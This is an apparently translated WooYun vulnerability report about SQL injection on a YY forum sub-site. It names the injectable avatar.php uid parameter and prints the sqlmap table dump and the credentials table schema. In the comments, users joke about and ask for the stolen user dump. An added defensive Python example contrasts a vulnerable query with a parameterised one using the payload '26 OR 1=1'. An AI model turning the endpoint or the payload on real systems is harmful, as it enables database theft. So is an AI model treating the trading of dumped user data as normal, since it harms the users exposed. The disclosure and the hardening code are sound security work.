YY sub-site SQL injection (data of over a hundred thousand users exposed)

admin | 2015-05-03 03:40:03 | 452 views | 204 characters | 0 min 40 s read
Summary

2014-07-21: Details reported to the vendor, awaiting vendor response
2014-07-21: Vendor confirmed; details disclosed to the vendor only
2014-07-31: Details disclosed to core white hats and relevant domain experts
2014-08-10: Details disclosed to regular white hats
2014-08-20: Details disclosed to intern white hats
2014-09-04: Details disclosed to the public

Vulnerability summary (followers: 20)

Defect ID: WooYun-2014-69190

Title: YY sub-site SQL injection (data of over a hundred thousand users exposed)

Vendor: Guangzhou Duowan (广州多玩)

Author: Jn·

Submitted: 2014-07-21 14:14

Published: 2014-09-04 14:16

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Vendor confirmed

Source: www.wooyun.org

Tags: sql


Vulnerability details


Brief description:

Detailed description:

One day I saw all those pretty girls on YY, and then....

Here are a few photos of the girls

[screenshot]

[screenshot]

Sigh, for the record, I didn't do anything.

Proof of vulnerability:

Injection point: http://bbs.1931.yy.com/uc_server/avatar.php?uid=26&size=middle (injectable parameter: uid=26)

Ran it through sqlmap and it dumped the database straight away.

[four sqlmap screenshots]

Database: dream_bbs
[296 tables]
+-----------------------------------+
| bbs_common_admincp_cmenu |
| bbs_common_admincp_group |
| bbs_common_admincp_member |
| bbs_common_admincp_perm |
| bbs_common_admincp_session |
| bbs_common_admingroup |
| bbs_common_adminnote |
| bbs_common_advertisement |
| bbs_common_advertisement_custom |
| bbs_common_banned |
| bbs_common_block |
| bbs_common_block_favorite |
| bbs_common_block_item |
| bbs_common_block_item_data |
| bbs_common_block_permission |
| bbs_common_block_pic |
| bbs_common_block_style |
| bbs_common_block_xml |
| bbs_common_cache |
| bbs_common_card |
| bbs_common_card_log |
| bbs_common_card_type |
| bbs_common_connect_guest |
| bbs_common_credit_log |
| bbs_common_credit_log_field |
| bbs_common_credit_rule |
| bbs_common_credit_rule_log |
| bbs_common_credit_rule_log_field |
| bbs_common_cron |
| bbs_common_devicetoken |
| bbs_common_district |
| bbs_common_diy_data |
| bbs_common_domain |
| bbs_common_failedip |
| bbs_common_failedlogin |
| bbs_common_friendlink |
| bbs_common_grouppm |
| bbs_common_invite |
| bbs_common_magic |
| bbs_common_magiclog |
| bbs_common_mailcron |
| bbs_common_mailqueue |
| bbs_common_member |
| bbs_common_member_action_log |
| bbs_common_member_connect |
| bbs_common_member_count |
| bbs_common_member_crime |
| bbs_common_member_field_forum |
| bbs_common_member_field_home |
| bbs_common_member_forum_buylog |
| bbs_common_member_grouppm |
| bbs_common_member_log |
| bbs_common_member_magic |
| bbs_common_member_medal |
| bbs_common_member_newprompt |
| bbs_common_member_profile |
| bbs_common_member_profile_setting |
| bbs_common_member_security |
| bbs_common_member_secwhite |
| bbs_common_member_stat_field |
| bbs_common_member_status |
| bbs_common_member_validate |
| bbs_common_member_verify |
| bbs_common_member_verify_info |
| bbs_common_myapp |
| bbs_common_myinvite |
| bbs_common_mytask |
| bbs_common_nav |
| bbs_common_onlinetime |
| bbs_common_optimizer |
| bbs_common_patch |
| bbs_common_plugin |
| bbs_common_pluginvar |
| bbs_common_process |
| bbs_common_regip |
| bbs_common_relatedlink |
| bbs_common_remote_port |
| bbs_common_report |
| bbs_common_searchindex |
| bbs_common_seccheck |
| bbs_common_secquestion |
| bbs_common_session |
| bbs_common_setting |
| bbs_common_smiley |
| bbs_common_sphinxcounter |
| bbs_common_stat |
| bbs_common_statuser |
| bbs_common_style |
| bbs_common_stylevar |
| bbs_common_syscache |
| bbs_common_tag |
| bbs_common_tagitem |
| bbs_common_task |
| bbs_common_taskvar |
| bbs_common_template |
| bbs_common_template_block |
| bbs_common_template_permission |
| bbs_common_uin_black |
| bbs_common_usergroup |
| bbs_common_usergroup_field |
| bbs_common_visit |
| bbs_common_word |
| bbs_common_word_type |
| bbs_connect_disktask |
| bbs_connect_feedlog |
| bbs_connect_memberbindlog |
| bbs_connect_postfeedlog |
| bbs_connect_tthreadlog |
| bbs_dsu_paulsign |
| bbs_dsu_paulsignemot |
| bbs_dsu_paulsignset |
| bbs_forum_access |
| bbs_forum_activity |
| bbs_forum_activityapply |
| bbs_forum_announcement |
| bbs_forum_attachment |
| bbs_forum_attachment_0 |
| bbs_forum_attachment_1 |
| bbs_forum_attachment_2 |
| bbs_forum_attachment_3 |
| bbs_forum_attachment_4 |
| bbs_forum_attachment_5 |
| bbs_forum_attachment_6 |
| bbs_forum_attachment_7 |
| bbs_forum_attachment_8 |
| bbs_forum_attachment_9 |
| bbs_forum_attachment_exif |
| bbs_forum_attachment_unused |
| bbs_forum_attachtype |
| bbs_forum_bbcode |
| bbs_forum_collection |
| bbs_forum_collectioncomment |
| bbs_forum_collectionfollow |
| bbs_forum_collectioninvite |
| bbs_forum_collectionrelated |
| bbs_forum_collectionteamworker |
| bbs_forum_collectionthread |
| bbs_forum_creditslog |
| bbs_forum_debate |
| bbs_forum_debatepost |
| bbs_forum_faq |
| bbs_forum_filter_post |
| bbs_forum_forum |
| bbs_forum_forum_threadtable |
| bbs_forum_forumfield |
| bbs_forum_forumrecommend |
| bbs_forum_groupcreditslog |
| bbs_forum_groupfield |
| bbs_forum_groupinvite |
| bbs_forum_grouplevel |
| bbs_forum_groupuser |
| bbs_forum_hotreply_member |
| bbs_forum_hotreply_number |
| bbs_forum_imagetype |
| bbs_forum_medal |
| bbs_forum_medallog |
| bbs_forum_memberrecommend |
| bbs_forum_moderator |
| bbs_forum_modwork |
| bbs_forum_newthread |
| bbs_forum_onlinelist |
| bbs_forum_order |
| bbs_forum_poll |
| bbs_forum_polloption |
| bbs_forum_polloption_image |
| bbs_forum_pollvoter |
| bbs_forum_post |
| bbs_forum_post_location |
| bbs_forum_post_moderate |
| bbs_forum_post_tableid |
| bbs_forum_postcache |
| bbs_forum_postcomment |
| bbs_forum_postlog |
| bbs_forum_poststick |
| bbs_forum_promotion |
| bbs_forum_ratelog |
| bbs_forum_relatedthread |
| bbs_forum_replycredit |
| bbs_forum_rsscache |
| bbs_forum_sofa |
| bbs_forum_spacecache |
| bbs_forum_statlog |
| bbs_forum_thread |
| bbs_forum_thread_moderate |
| bbs_forum_threadaddviews |
| bbs_forum_threadcalendar |
| bbs_forum_threadclass |
| bbs_forum_threadclosed |
| bbs_forum_threaddisablepos |
| bbs_forum_threadhidelog |
| bbs_forum_threadhot |
| bbs_forum_threadimage |
| bbs_forum_threadlog |
| bbs_forum_threadmod |
| bbs_forum_threadpartake |
| bbs_forum_threadpreview |
| bbs_forum_threadprofile |
| bbs_forum_threadprofile_group |
| bbs_forum_threadrush |
| bbs_forum_threadtype |
| bbs_forum_trade |
| bbs_forum_tradecomment |
| bbs_forum_tradelog |
| bbs_forum_typeoption |
| bbs_forum_typeoptionvar |
| bbs_forum_typevar |
| bbs_forum_warning |
| bbs_home_album |
| bbs_home_album_category |
| bbs_home_appcreditlog |
| bbs_home_blacklist |
| bbs_home_blog |
| bbs_home_blog_category |
| bbs_home_blog_moderate |
| bbs_home_blogfield |
| bbs_home_class |
| bbs_home_click |
| bbs_home_clickuser |
| bbs_home_comment |
| bbs_home_comment_moderate |
| bbs_home_docomment |
| bbs_home_doing |
| bbs_home_doing_moderate |
| bbs_home_favorite |
| bbs_home_feed |
| bbs_home_feed_app |
| bbs_home_follow |
| bbs_home_follow_feed |
| bbs_home_follow_feed_archiver |
| bbs_home_friend |
| bbs_home_friend_request |
| bbs_home_friendlog |
| bbs_home_notification |
| bbs_home_pic |
| bbs_home_pic_moderate |
| bbs_home_picfield |
| bbs_home_poke |
| bbs_home_pokearchive |
| bbs_home_share |
| bbs_home_share_moderate |
| bbs_home_show |
| bbs_home_specialuser |
| bbs_home_userapp |
| bbs_home_userappfield |
| bbs_home_visitor |
| bbs_mobile_setting |
| bbs_mobileoem_member |
| bbs_mobileoem_pushthreads |
| bbs_portal_article_content |
| bbs_portal_article_count |
| bbs_portal_article_moderate |
| bbs_portal_article_related |
| bbs_portal_article_title |
| bbs_portal_article_trash |
| bbs_portal_attachment |
| bbs_portal_category |
| bbs_portal_category_permission |
| bbs_portal_comment |
| bbs_portal_comment_moderate |
| bbs_portal_rsscache |
| bbs_portal_topic |
| bbs_portal_topic_pic |
| bbs_security_evilpost |
| bbs_security_eviluser |
| bbs_security_failedlog |
| bbs_ucenter_admins |
| bbs_ucenter_applications |
| bbs_ucenter_badwords |
| bbs_ucenter_domains |
| bbs_ucenter_failedlogins |
| bbs_ucenter_feeds |
| bbs_ucenter_friends |
| bbs_ucenter_mailqueue |
| bbs_ucenter_memberfields |
| bbs_ucenter_members |
| bbs_ucenter_mergemembers |
| bbs_ucenter_newpm |
| bbs_ucenter_notelist |
| bbs_ucenter_pm_indexes |
| bbs_ucenter_pm_lists |
| bbs_ucenter_pm_members |
| bbs_ucenter_pm_messages_0 |
| bbs_ucenter_pm_messages_1 |
| bbs_ucenter_pm_messages_2 |
| bbs_ucenter_pm_messages_3 |
| bbs_ucenter_pm_messages_4 |
| bbs_ucenter_pm_messages_5 |
| bbs_ucenter_pm_messages_6 |
| bbs_ucenter_pm_messages_7 |
| bbs_ucenter_pm_messages_8 |
| bbs_ucenter_pm_messages_9 |
| bbs_ucenter_protectedmembers |
| bbs_ucenter_settings |
| bbs_ucenter_sqlcache |
| bbs_ucenter_tags |
| bbs_ucenter_vars |
+-----------------------------------+

Database: dream_bbs
Table: bbs_ucenter_members
[16 columns]
+-------------------+-------------------------+
| Column            | Type                    |
+-------------------+-------------------------+
| avatar_big_url    | varchar(255)            |
| avatar_middle_url | varchar(255)            |
| avatar_small_url  | varchar(255)            |
| email             | char(32)                |
| lastloginip       | int(10)                 |
| lastlogintime     | int(10) unsigned        |
| myid              | char(30)                |
| myidkey           | char(16)                |
| password          | char(32)                |
| regdate           | int(10) unsigned        |
| regip             | char(15)                |
| salt              | char(6)                 |
| secques           | char(8)                 |
| udbname           | char(20)                |
| uid               | mediumint(8) unsigned   |
| username          | char(15)                |
+-------------------+-------------------------+

[screenshot]

Suggested fix:

The vendor knows better than I do; for the record, I didn't do anything. Could YY give me a little pet?
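The report leaves the fix to the vendor. The following is an added example, not code from the report or from YY, Discuz or UCenter: the real avatar.php source is not on the page, so the "unsafe" function is an assumed reconstruction of the pattern that makes a numeric uid parameter injectable, placed beside the hardened version a defender would ship (strict integer validation plus a bound parameter). The table, rows and URLs are constructed; the uid range check uses the mediumint(8) unsigned type that appears in the dumped schema.

```python
"""Added example (not from the WooYun report or the affected forum software):
an assumed vulnerable avatar lookup next to its hardened form, run offline
against an in-memory SQLite table with constructed rows."""
import re
import sqlite3

# Constructed sample rows standing in for the forum's member table. The real
# ucenter_members schema on the page has 16 columns; three are enough for the
# lookup that an avatar endpoint performs.
SAMPLE_MEMBERS = [
    (1, "alice", "https://img.example.test/avatar/1_middle.jpg"),
    (26, "bob", "https://img.example.test/avatar/26_middle.jpg"),
    (27, "carol", "https://img.example.test/avatar/27_middle.jpg"),
]

# Upper bound of MySQL mediumint(8) unsigned, the type of `uid` in the dumped schema.
MEDIUMINT_UNSIGNED_MAX = 16_777_215


def make_db():
    """Build an in-memory SQLite database holding the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE members (uid INTEGER PRIMARY KEY, username TEXT, avatar_middle_url TEXT)"
    )
    conn.executemany("INSERT INTO members VALUES (?, ?, ?)", SAMPLE_MEMBERS)
    conn.commit()
    return conn


def avatar_unsafe(conn, uid_param):
    """Assumed vulnerable pattern (hypothetical, not the real avatar.php code):
    the raw query-string value is concatenated into the statement, so anything
    after the digits is executed as SQL."""
    sql = "SELECT uid, avatar_middle_url FROM members WHERE uid = " + uid_param
    return conn.execute(sql).fetchall()


def parse_uid(uid_param):
    """Allow-list validation: accept only a canonical positive decimal integer
    that fits the column type. Everything else is rejected before any SQL runs."""
    if not re.fullmatch(r"[1-9][0-9]*", uid_param):
        raise ValueError("uid must be a positive integer")
    uid = int(uid_param)
    if uid > MEDIUMINT_UNSIGNED_MAX:
        raise ValueError("uid out of range for mediumint(8) unsigned")
    return uid


def is_valid_uid(uid_param):
    """True if parse_uid would accept the value; handy for logging rejected requests."""
    try:
        parse_uid(uid_param)
        return True
    except ValueError:
        return False


def avatar_safe(conn, uid_param):
    """Hardened lookup: the validated integer is bound as a parameter, never spliced in."""
    uid = parse_uid(uid_param)
    return conn.execute(
        "SELECT uid, avatar_middle_url FROM members WHERE uid = ?", (uid,)
    ).fetchall()


def compare(uid_param):
    """Run both lookups on the same input and report how many rows each returns
    (None for the hardened version means the input was rejected)."""
    conn = make_db()
    unsafe_rows = avatar_unsafe(conn, uid_param)
    safe_rows = avatar_safe(conn, uid_param) if is_valid_uid(uid_param) else None
    conn.close()
    return {
        "unsafe_rows": len(unsafe_rows),
        "safe_rows": None if safe_rows is None else len(safe_rows),
    }


if __name__ == "__main__":
    print(compare("26"))         # both paths return the single row for uid 26
    print(compare("26 OR 1=1"))  # unsafe path returns every row; hardened path rejects the input
```

The validation deliberately rejects leading zeros and out-of-range values as well as non-digits, so the only thing that reaches the database is an integer the column can hold; the parameter binding is what actually prevents injection, and the validator gives you a clean signal to log and alert on when an avatar request carries anything other than a plain uid.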

Copyright notice: please credit the source when reposting: Jn· @ WooYun


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 15

Confirmed: 2014-07-21 17:34

Vendor reply:

Thank you for supporting the security work of YY Inc. (欢聚时代); we will fix this as soon as possible.

Latest status:

None yet




Comments

  1. 2014-07-21 14:43 | 黑马 ( Passerby | Rank:0 Vulns:2 | Don't ask me where I come from, I am the light in the darkness!)

    0

    Publish it, let me have a look

  2. 2014-07-21 15:07 | 信通联盟支付 (WooYun vendor)

    0

    Share the dump please

  3. 2014-07-21 15:12 | Ton7BrEak ( Regular white hat | Rank:330 Vulns:70 | ☁ I'll keep working hard!)

    0

    @信通联盟支付 Is this really a vendor?~= =#

  4. 2014-07-21 15:16 | 泳少 ( Regular white hat | Rank:257 Vulns:84 | ★ Now that I've set out on the road of dreams, even on my knees I must...)

    0

    Looks like OP dumped the database... what do you think? @U神

  5. 2014-07-21 15:22 | Ton7BrEak ( Regular white hat | Rank:330 Vulns:70 | ☁ I'll keep working hard!)

    0

    @泳少 I think she definitely dumped it~ Looks like I have to go home and change my password! Don't tell me it's plaintext passwords again?

  6. 2014-07-21 15:37 | MT哥 ( Intern white hat | Rank:70 Vulns:35 | A wretched brick-carrier moonlighting as a dishwasher, broke loser, newbie -A...)

    0

    @泳少 Already dumped, I've got it here

  7. 2014-07-21 15:47 | 泳少 ( Regular white hat | Rank:257 Vulns:84 | ★ Now that I've set out on the road of dreams, even on my knees I must...)

    0

    @MT哥 People who dump databases aren't good white hats... What does everyone think of him... ahem...

  8. 2014-07-21 15:56 | U神 ( Core white hat | Rank:1375 Vulns:152 | WooYun core newbie, this account is under alliance custody....)

    0

    @泳少 ??? What's going on?

  9. 2014-07-21 16:00 | Jn· ( Passerby | Rank:30 Vulns:14 | This little newbie is very cute, if you don't like it come and fight me -- oh...)

    0

    @泳少 I already said I'm a good guy, I don't know what you call "dumping". If I'd dumped it, I'd let you have a look...

  10. 2014-07-21 16:07 | 泳少 ( Regular white hat | Rank:257 Vulns:84 | ★ Now that I've set out on the road of dreams, even on my knees I must...)

    0

    @ Jn· Uh-huh... I'm just passing by... MT哥... damn... already pulled... ahem

  11. 2014-07-21 16:27 | CoffeeSafe ( Regular white hat | Rank:142 Vulns:37 )

    0

    Open up! Here to collect the electricity bill!

  12. 2014-07-21 17:31 | 小磊 ( Passerby | Rank:1 Vulns:3 | For a dream of security technology.)

    0

    Pants off, what colour is underneath.

  13. 2014-07-21 19:47 | Xder神奇的蛋蛋 ( Passerby | Rank:0 Vulns:1 | Hehe)

    0

    @MT哥 Are you sure you've got it?

  14. 2014-07-22 08:08 | Ev1l ( Intern white hat | Rank:68 Vulns:20 | The issue really exists but the impact is small. Contact email security...)

    0

    @U神 @ Jn· JJ is very interested in this kind of thing... right, U神

  15. 2014-08-01 05:44 | Hannibal ( Passerby | Rank:5 Vulns:1 | I'm well-behaved, I don't get high.)

    0

    @MT哥 As long as you don't show me your little brother, I'll ask for the dump

  16. 2014-08-21 20:07 | 大白菜 ( Intern white hat | Rank:52 Vulns:19 )

    0

    @MT哥 Share the dump please~

  17. 2014-10-05 16:38 | 风花雪月 ( Intern white hat | Rank:67 Vulns:49 | []+[]|[]-[][][][][]%[][]|[]/[]%[][]|[]/[...)

    0

    You say you didn't do anything; let's see whether I believe you?
